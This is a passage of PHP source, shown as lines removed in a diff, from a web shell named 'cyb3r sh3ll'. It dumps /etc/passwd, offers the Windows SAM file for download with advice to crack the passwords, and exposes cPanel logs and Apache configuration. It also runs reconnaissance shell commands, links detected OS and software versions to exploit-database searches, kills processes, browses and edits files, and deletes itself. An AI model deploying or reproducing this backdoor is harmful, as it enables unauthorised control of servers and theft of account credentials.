- echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";

-

- if (!$win)

-

- {

-

-  if ($nixpasswd)

-

-  {

-

-   if ($nixpasswd == 1) {$nixpasswd = 0;}

-

-   echo "<b>*nix /etc/passwd:</b><br>";

-

-   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}

-

-   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}

-

-   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";

-

-   $i = $nixpwd_s;

-

-   while ($i < $nixpwd_e)

-

-   {

-

-    $uid = posix_getpwuid($i);

-

-    if ($uid)

-

-    {

-

-     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";

-

-     echo join(":",$uid)."<br>";

-

-    }

-

-    $i++;

-

-   }

-

-  }

-

-  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}

-

- }

-

- else

- {

-  $v = $_SERVER["WINDIR"]."\repair\sam";

-

-  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}

-

-  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}

- }

-

- if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}

-

- if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}

-

- if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}

-

- if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}

-

- if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}

-

- if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}

-

- if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}

-

- function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}

-

- displaysecinfo("OS Version?",myshellexec("cat /proc/version"));

-

- displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));

-

- displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));

-

- displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));

-

- displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));

-

- displaysecinfo("RAM",myshellexec("free -m"));

-

- displaysecinfo("HDD space",myshellexec("df -h"));

-

- displaysecinfo("List of Attributes",myshellexec("lsattr -a"));

-

- displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));

-

- displaysecinfo("Is cURL installed?",myshellexec("which curl"));

-

- displaysecinfo("Is lynx installed?",myshellexec("which lynx"));

-

- displaysecinfo("Is links installed?",myshellexec("which links"));

-

- displaysecinfo("Is fetch installed?",myshellexec("which fetch"));

-

- displaysecinfo("Is GET installed?",myshellexec("which GET"));

-

- displaysecinfo("Is perl installed?",myshellexec("which perl"));

-

- displaysecinfo("Where is apache",myshellexec("whereis apache"));

-

- displaysecinfo("Where is perl?",myshellexec("whereis perl"));

-

- displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));

-

- displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));

-

- displaysecinfo("locate my.conf",myshellexec("locate my.conf"));

-

- displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));

-

-}

-

-if ($act == "mkfile")

-

-{

- if ($mkfile != $d)

-

- {

-  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}

-

-  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}

-

-  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}

-

- }

- else {$act = $dspact = "ls";}

-

-}

-

-if ($act == "encoder")

-

-{

- echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";

-

- foreach(array("md5","crypt","sha1","crc32") as $v)

-

- {

-  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";

- }

-

- echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>

-

- <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>

-

- <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";

-

- echo "<center>base64_decode - ";

-

- if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}

-

- else

-

- {

-

-  $debase64 = base64_decode($encoder_input);

-

-  $debase64 = str_replace("\0","[0]",$debase64);

-

-  $a = explode("\r\n",$debase64);

-

-  $rows = count($a);

-

-  $debase64 = htmlspecialchars($debase64);

-

-  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}

-

-  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}

-

-  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";

-

- }

-

- echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";

-

- $c = strlen($encoder_input);

-

- for($i=0;$i<$c;$i++)

-

- {

-  $hex = dechex(ord($encoder_input[$i]));

-

-  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}

-

-  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}

- }

-

- echo "\" readonly><br></center></form>";

-

-}

-

-if ($act == "selfremove")

-{

- if (($submit == $rndcode) and ($submit != ""))

-

- {

-

-  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using cyb3r sh3ll v.".$shver."!"; cyb3rexit(); }

-

-  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}

-

- }

-

- else

-

- {

-

-  if (!empty($rndcode)) {echo "<b>Error: Incorrect Confimation!</b>";}

-

-  $rnd = rand(0,9).rand(0,9).rand(0,9);

-

-  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";

-

- }

-

-}

-

-if ($act == "serverinfo")

-{

-

-global $windows,$disablefunctions,$safemode;

-$cwd= getcwd();

-$mil="<a target=\"_blank\" href=\"http://www.exploit-db.com/search/?action=search&filter_exploit_text=";

-$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";

-if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"];

-$osver=$tsize=$fsize='';

-if ($windows){ 

-$osver = "  (".shelL("ver").")";

-$sysroot = shelL("echo %systemroot%");

-if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"];

-if (empty($sysroot)) $sysroot = getenv("windir");

-if (empty($sysroot)) $sysroot = "Not Found";

-if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%");

-for ($i=66;$i<=90;$i++){

-$drive= chr($i).':\\';

-if (is_dir($drive)){

-$fsize+=@disk_free_space($drive);

-$tsize+=@disk_total_space($drive);

-}

-}

-}else{

-$fsize=disk_free_space('/');

-$tsize=disk_total_space('/');

-}

-$disksize="Used Space: ". showsizE($tsize-$fsize) . "   Free Space: ". showsizE($fsize) . "   Total Space: ". showsizE($tsize);

-if (empty($CPU)) $CPU = "Unknown";

-$os = php_unamE();

-$osn=php_unamE('s');

-if(!$windows){ 

-$ker = php_unamE('r');

-$o=($osn=="Linux")?"Linux+Kernel":$osn;

-$os = str_replace($osn,"${mil}$o\"><font color='yellow'>$osn</font></a>",$os);

-$os = str_replace($ker,"${mil}Linux+Kernel\"><font color='yellow'>$ker</font></a>",$os);

-$inpa=':';

-}else{

-$sam = $sysroot."\\system32\\config\\SAM";

-$inpa=';';

-$os = str_replace($osn,"${mil}MS+Windows\"><font color='yellow'>$osn</font></a>",$os);

-}

-$software=str_replace("Apache","${mil}Apache\"><font color='#66ffff'>Apache</font></a>",$_SERVER['SERVER_SOFTWARE']);

-echo "

-<table border=1 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\"  width=\"100%\" >

- <tr><td><b>Server information:</b></td></tr>

- <tr><td width=\"25%\" bgcolor=\"#666666\">Server:</td>

- <td bgcolor=\"#666666\">".$_SERVER["HTTP_HOST"];

-if (!empty($_SERVER["SERVER_ADDR"])){

- echo "(". $_SERVER["SERVER_ADDR"] .")";}

-echo "

-</td></tr>

-<tr><td width=\"25%\" >Operation System:</td>    <td >$os$osver</td></tr>

-<tr><td width=\"25%\" bgcolor=\"#666666\">Web server Application:</td>  <td bgcolor=\"#666666\">$software</td></tr>

-<tr><td width=\"25%\" >CPU:</td>  <td >$CPU</td></tr>

- <td width=\"25%\" bgcolor=\"#666666\">Disk status:</td><td bgcolor=\"#666666\">$disksize</td></tr>

-<tr><td width=\"25%\" >User domain:</td><td >";

-if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];

-else echo "Unknown"; 

-echo "

-</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><a href=\"".$surl."act=processes\" ><font color=#66ffff>User Name </font>:</a></td>

-<td bgcolor=\"#666666\">";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();

-else echo "Unknown"; echo "</td></tr>";

-if ($windows){

-echo "

-<tr><td width=\"25%\" >Windows directory:</td><td ><a href=\"".$surl."act=ls&d=$sysroot"."\"><font color=yellow>$sysroot</font></a></td></tr><tr>

-<td width=\"25%\" bgcolor=\"#666666\">Sam file:</td><td bgcolor=\"#666666\">";

-if (is_readable(($sam)))echo "<a href=\"".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."\">

-<font color=#66ffff>Readable</font></a>"; else echo "Not readable";echo "</td></tr>";

-}

-else

-{

-echo "<tr><td width=\"25%\" >Passwd file:</td><td >";

-if (is_readable('/etc/passwd')) echo "

-<a href=\"".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."\">Readable</a>"; else echo'Not readable';echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Cpanel log file:</td><td bgcolor=\"#666666\">";

-if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "<a href=\"".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."\"><font color=#66ffff>Readable</font></a>"; else echo "Not readable";}else echo "Not found";

-echo "</td></tr>";

-}

-$uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR');

-echo "

-<tr><td width=\"25%\" >${mil}PHP\"><font color=yellow>PHP</font></a> version:</td>

-<td ><a href=\"?=".php_logo_guid()."\" target=\"_blank\"><font color=yellow>".PHP_VERSION."</font></a> 

-(<a href=\"".$surl."act=phpinfo\"><font color=yellow>more...</font></a>)</td></tr>

-<tr><td width=\"25%\" bgcolor=\"#666666\">Zend version:</td>

-<td bgcolor=\"#666666\">";if (function_exists('zend_version')) echo "<a href=\"?=".zend_logo_guid()."\" target=\"_blank\"><font color=#66ffff>".zend_version()."</font></a>";

-else echo "Not Found";echo "</td>

-<tr><td width=\"25%\" >Include path:</td>

-<td >".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."</td>

-<tr><td width=\"25%\" bgcolor=\"#666666\">PHP Modules:</td>

-<td bgcolor=\"#666666\">";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";

-echo "</td><tr><td width=\"25%\" >Disabled functions:</td><td >";

-if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"</td></tr>

-<tr><td width=\"25%\" bgcolor=\"#666666\">Safe mode:</td><td bgcolor=\"#666666\">$sfmode</font></td></tr>

-<tr><td width=\"25%\" >Open base dir:</td><td >$basedir</td></tr>

-<tr><td width=\"25%\" bgcolor=\"#666666\">DBMS:</td>

-<td bgcolor=\"#666666\">";$sq="";

-if(function_exists('mysql_connect')) $sq= "${mil}MySQL\"><font color=#66ffff>MySQL</font></a> ";

-if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\"><font color=#66ffff>MSSQL</font></a> ";

-if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\"><font color=#66ffff>Oracle</font></a> ";

-if(function_exists('sqlite_open')) $sq.= " SQLite ";

-if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\"><font color=#66ffff>PostgreSQL</font></a> ";

-if(function_exists('msql_connect')) $sq.= " mSQL ";

-if(function_exists('mysqli_connect'))$sq.= " MySQLi ";

-if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";

-if ($sq=="") $sq= "Nothing"; 

-

-echo "$sq</td></tr>";if (function_exists('curl_init')) echo "<tr><td width=\"25%\" >cURL support:</td><td >Enabled ";

-if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "</td></tr>";echo "</table>";

-

-}

-

-if ($act == "clientinfo")

-{

-echo "<table><tr><td><b>User information</b>:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">IP:</td><td bgcolor=\"#666666\">".$_SERVER['REMOTE_ADDR']."</td></tr><tr><td width=\"25%\" >Agent:</td><td >".getenv('HTTP_USER_AGENT')."</td></tr></table>";

-}

-

-if ($act == "processes")

-

-{

-

- echo "<b>Processes:</b><br>";

-

- if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}

-

- else {$handler = "tasklist";}

-

- $ret = myshellexec($handler);

-

- if (!$ret) {echo "Can't execute \"".$handler."\"!";}

-

- else

-

- {

-

-  if (empty($processes_sort)) {$processes_sort = $sort_default;}

-

-  $parsesort = parsesort($processes_sort);

-

-  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}

-

-  $k = $parsesort[0];

-

-  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}

-

-  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}

-

-  $ret = htmlspecialchars($ret);

-

-  if (!$win)

-

-  {

-

-   if ($pid)

-

-   {

-

-    if (is_null($sig)) {$sig = 9;}

-

-    echo "Sending signal ".$sig." to #".$pid."... ";

-

-    if (posix_kill($pid,$sig)) {echo "OK.";}

-

-    else {echo "ERROR.";}

-

-   }

-

-   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}

-

-   $stack = explode("\n",$ret);

-

-   $head = explode(" ",$stack[0]);

-

-   unset($stack[0]);

-

-   for($i=0;$i<count($head);$i++)

-

-   {

-

-    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}

-

-   }

-

-   $prcs = array();

-

-   foreach ($stack as $line)

-

-   {

-

-    if (!empty($line))

-

-{

-

- echo "<tr>";

-

-     $line = explode(" ",$line);

-

-     $line[10] = join(" ",array_slice($line,10));

-

-     $line = array_slice($line,0,11);

-

-     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}

-

-     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";

-

-     $prcs[] = $line;

-

-     echo "</tr>";

-

-    }

-

-   }

-

-  }

-

-  else

-

-  {

-

-   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}

-

-   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}

-

-   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}

-

-   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}

-

-   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}

-

-   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}

-

-   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}

-

-   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}

-

-   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}

-

-   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}

-

-   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}

-

-   $ret = convert_cyr_string($ret,"d","w");

-

-   $stack = explode("\n",$ret);

-

-   unset($stack[0],$stack[2]);

-

-   $stack = array_values($stack);

-

-   $head = explode("",$stack[0]);

-

-   $head[1] = explode(" ",$head[1]);

-

-   $head[1] = $head[1][0];

-

-   $stack = array_slice($stack,1);

-

-   unset($head[2]);

-

-   $head = array_values($head);

-

-   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}

-

-   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}

-

-   if ($k > count($head)) {$k = count($head)-1;}

-

-   for($i=0;$i<count($head);$i++)

-

-   {

-

-    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}

-

-   }

-

-   $prcs = array();

-

-   foreach ($stack as $line)

-

-   {

-

-    if (!empty($line))

-

-    {

-

-     echo "<tr>";

-

-     $line = explode("",$line);

-

-     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);

-

-     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 

-

-     $prcs[] = $line;

-

-     echo "</tr>";

-

-    }

-

-   }

-

-  }

-

-  $head[$k] = "<b>".$head[$k]."</b>".$y;

-

-  $v = $processes_sort[0];

-

-  usort($prcs,"tabsort");

-

-  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}

-

-  $tab = array();

-

-  $tab[] = $head;

-

-  $tab = array_merge($tab,$prcs);

-

-  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";

-

-  foreach($tab as $i=>$k)

-

-  {

-

-   echo "<tr>";

-

-   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}

-

-   echo "</tr>";

-

-  }

-

-  echo "</table>";

-

- }

-

-}

-

-if ($act == "ls")

-{

- if (count($ls_arr) > 0) {$list = $ls_arr;}

- else

- {

-

-  $list = array();

-

-  if ($h = @opendir($d))

-

-  {

-

-   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}

-

-   closedir($h);

-

-  }

-

-  else {}

-

- }

-

- if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}

- else

- {

-

-  //Building array

-

-  $objects = array();

-

-  $vd = "f"; //Viewing mode

-

-  if ($vd == "f")

-

-  {

-

-   $objects["head"] = array();

-

-   $objects["folders"] = array();

-

-   $objects["links"] = array();

-

-   $objects["files"] = array();

-

-   foreach ($list as $v)

-

-   {

-

-    $o = basename($v);

-

-    $row = array();

-

-    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}

-

-    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}

-

-    elseif (is_dir($v))

-

-    {

-

-     if (is_link($v)) {$type = "LINK";}

-

-     else {$type = "DIR";}

-

-     $row[] = $v;

-

-     $row[] = $type;

-

-    }

-

-    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}

-

-    $row[] = filemtime($v);

-

-    if (!$win)

-

-    {

-

-     $ow = posix_getpwuid(fileowner($v));

-

-     $gr = posix_getgrgid(filegroup($v));

-

-     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));

-

-    }

-

-    $row[] = fileperms($v);

-

-    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}

-

-    elseif (is_link($v)) {$objects["links"][] = $row;}

-

-    elseif (is_dir($v)) {$objects["folders"][] = $row;}

-

-    elseif (is_file($v)) {$objects["files"][] = $row;}

-

-    $i++;

-

-   }

-

-   $row = array();

-

-   $row[] = "<b>Name</b>";

-

-   $row[] = "<b>Size</b>";

-

-   $row[] = "<b>Modify</b>";

-

-   if (!$win)

-

-  {$row[] = "<b>Owner/Group</b>";}

-

-   $row[] = "<b>Perms</b>";

-

-   $row[] = "<b>Action</b>";

-

-   $parsesort = parsesort($sort);

-

-   $sort = $parsesort[0].$parsesort[1];

-

-   $k = $parsesort[0];

-

-   if ($parsesort[1] != "a") {$parsesort[1] = "d";}

-

-   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";

-

-   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";

-

-   $row[$k] .= $y;

-

-   for($i=0;$i<count($row)-1;$i++)

-

-   {

-

-    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}

-

-   }

-

-   $v = $parsesort[0];

-

-   usort($objects["folders"], "tabsort");

-

-   usort($objects["links"], "tabsort");

-

-   usort($objects["files"], "tabsort");

-

-   if ($parsesort[1] == "d")

-

-   {

-

-    $objects["folders"] = array_reverse($objects["folders"]);

-

-    $objects["files"] = array_reverse($objects["files"]);

-

-   }

-

-   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);

-

-   $tab = array();

-

-   $tab["cols"] = array($row);

-

-   $tab["head"] = array();

-

-   $tab["folders"] = array();

-

-   $tab["links"] = array();

-

-   $tab["files"] = array();

-

-   $i = 0;

-

-   foreach ($objects as $a)

-

-   {

-

-    $v = $a[0];

-

-    $o = basename($v);

-

-    $dir = dirname($v);

-

-    if ($disp_fullpath) {$disppath = $v;}

-

-    else {$disppath = $o;}

-

-    $disppath = str2mini($disppath,60);

-

-    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}

-

-    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}

-

-    foreach ($regxp_highlight as $r)

-

-    {

-

-     if (ereg($r[0],$o))

-

-     {

-

-      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; cyb3rexit();}

-

-      else

-

-      {

-

-       $r[1] = round($r[1]);

-

-       $isdir = is_dir($v);

-

-       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))

-

-       {

-

-        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}

-

-        $disppath = $r[2].$disppath.$r[3];

-

-        if ($r[4]) {break;}

-

-       }

-

-      }

-

-     }

-

-    }

-

-    $uo = urlencode($o);

-

-    $ud = urlencode($dir);

-

-    $uv = urlencode($v);

-

-    $row = array();

-

-    if ($o == ".")

-

-    {

-

-     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";

-

-     $row[] = "LINK";

-

-    }

-

-    elseif ($o == "..")

-

-    {

-

-     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";

-

-     $row[] = "LINK";

-

-    }

-

-    elseif (is_dir($v))

-

-    {

-

-     if (is_link($v))

-

-     {

-

-      $disppath .= " => ".readlink($v);

-

-      $type = "LINK";

-

-      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";

-

-     }

-

-     else

-

-     {

-

-      $type = "DIR";

-

-      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";

-

-      }

-

-     $row[] = $type;

-

-    }

-

-    elseif(is_file($v))

-

-    {

-

-     $ext = explode(".",$o);

-

-     $c = count($ext)-1;

-

-     $ext = $ext[$c];

-

-     $ext = strtolower($ext);

-

-     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";

-

-     $row[] = view_size($a[1]);

-

-    }

-

-    $row[] = date("d.m.Y H:i:s",$a[2]);

-

-    if (!$win) {$row[] = $a[3];}

-

-    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";

-

-    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}

-

-    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}

-

-    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;}

-

-    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;}

-

-    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}

-

-    elseif (is_link($v)) {$tab["links"][] = $row;}

-

-    elseif (is_dir($v)) {$tab["folders"][] = $row;}

-

-    elseif (is_file($v)) {$tab["files"][] = $row;}

-

-    $i++;

-

-   }

-

-  }

-

